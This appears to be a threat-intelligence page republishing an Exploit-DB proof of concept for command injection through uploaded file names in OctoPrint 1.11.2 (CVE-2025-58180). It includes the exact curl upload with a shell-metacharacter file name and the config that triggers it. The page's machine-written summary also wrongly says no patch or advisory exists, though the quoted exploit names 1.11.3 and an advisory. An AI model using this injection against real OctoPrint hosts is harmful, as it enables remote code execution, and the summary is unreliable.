OctoPrint 1.11.2 - File Upload
OctoPrint 1.11.2 - File Upload
AI Analysis
Technical Summary
This threat involves an exploit against OctoPrint 1.11.2 focusing on the file upload feature. The exploit code is published in Exploit-DB (ID 52476) but no further technical details or affected sub-versions are specified. There is no vendor advisory or patch information available to confirm remediation status.
Potential Impact
The impact is currently unclear due to limited technical details and lack of vendor advisory. The exploit potentially allows unauthorized file uploads, which could lead to unauthorized code execution or system compromise depending on OctoPrint's handling of uploaded files. No known exploits in the wild have been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official fixes or mitigations are published, users should exercise caution with file uploads and consider restricting access to OctoPrint instances.
Indicators of Compromise
- exploit-code: # Exploit Title: OctoPrint 1.11.2 - File Upload # Date: 2025-09-28 # Exploit Author: prabhatverma.addada # Vendor Homepage: https://octoprint.org # Software Link: https://github.com/OctoPrint/OctoPrint # Affected Version(s): <= 1.11.2 # Patched Version(s): 1.11.3 # CVE: CVE-2025-58180 # CVSS (per advisory): 7.5 # Platform: Linux / OctoPrint server # Type: Remote Code Execution (requires authenticated upload / API key or session) # # Short description: # An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename # sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host. # # Scope & privileges: # - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack. # - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator. # # Tested on: # - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04 # # Reproduction / PoC (manual): # # 1) Start OctoPrint 1.11.2: # octoprint serve --port 5000 --debug # Complete initial setup at http://127.0.0.1:5000 and create an admin user. # # 2) Configure a system event handler that runs shell commands with filename placeholders: # Edit ~/.octoprint/config.yaml and add: # # events: # enabled: true # subscriptions: # - event: FileAdded # type: system # debug: true # command: "{path}" # # Restart OctoPrint. # # 3) Create a harmless test gcode: # mkdir -p /tmp/gcode # cat > /tmp/gcode/ok.gcode <<'EOF' # ; minimal gcode # G28 # M105 # EOF # # 4) Obtain API key from Settings -> API and export it: # export API_KEY='<your_api_key_here>' # # 5) Ensure target proof file does not exist: # ls -la /tmp/test123 # # 6) PoC upload (non-destructive proof): # INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode' # # curl -sS -X POST -H "X-Api-Key: $API_KEY" \ # -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \ # "http://127.0.0.1:5000/api/files/local" # # 7) Verify execution: # ls -la /tmp/test123 # If /tmp/test123 exists, the injected command executed and RCE is demonstrated. # # Explanation: # - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config). # - FileAdded event payload contains the filename/path. # - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping. # - Shell metacharacters in the filename are interpreted by the shell and executed. # # Mitigations / Workarounds: # - Upgrade OctoPrint to 1.11.3 (patched). # - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager). # - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads. # - Do not expose OctoPrint to hostile networks; restrict upload access. # # References: # - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc # - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180 # # Notes for triage: # - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack. # - PoC uses non-destructive `touch /tmp/test123`.
OctoPrint 1.11.2 - File Upload
Description
OctoPrint 1.11.2 - File Upload
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves an exploit against OctoPrint 1.11.2 focusing on the file upload feature. The exploit code is published in Exploit-DB (ID 52476) but no further technical details or affected sub-versions are specified. There is no vendor advisory or patch information available to confirm remediation status.
Potential Impact
The impact is currently unclear due to limited technical details and lack of vendor advisory. The exploit potentially allows unauthorized file uploads, which could lead to unauthorized code execution or system compromise depending on OctoPrint's handling of uploaded files. No known exploits in the wild have been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official fixes or mitigations are published, users should exercise caution with file uploads and consider restricting access to OctoPrint instances.
Technical Details
- Edb Id
- 52476
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for OctoPrint 1.11.2 - File Upload
# Exploit Title: OctoPrint 1.11.2 - File Upload # Date: 2025-09-28 # Exploit Author: prabhatverma.addada # Vendor Homepage: https://octoprint.org # Software Link: https://github.com/OctoPrint/OctoPrint # Affected Version(s): <= 1.11.2 # Patched Version(s): 1.11.3 # CVE: CVE-2025-58180 # CVSS (per advisory): 7.5 # Platform: Linux / OctoPrint server # Type: Remote Code Execution (requires authenticated upload / API key or session) # # Short description: # An authenticated attacker with file-uploa... (2990 more characters)
Threat ID: 69845ddcf9fa50a62f0fd49c
Added to database: 2/5/2026, 9:07:40 AM
Last enriched: 4/7/2026, 11:04:41 AM
Last updated: 5/6/2026, 7:22:14 PM
Views: 121
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.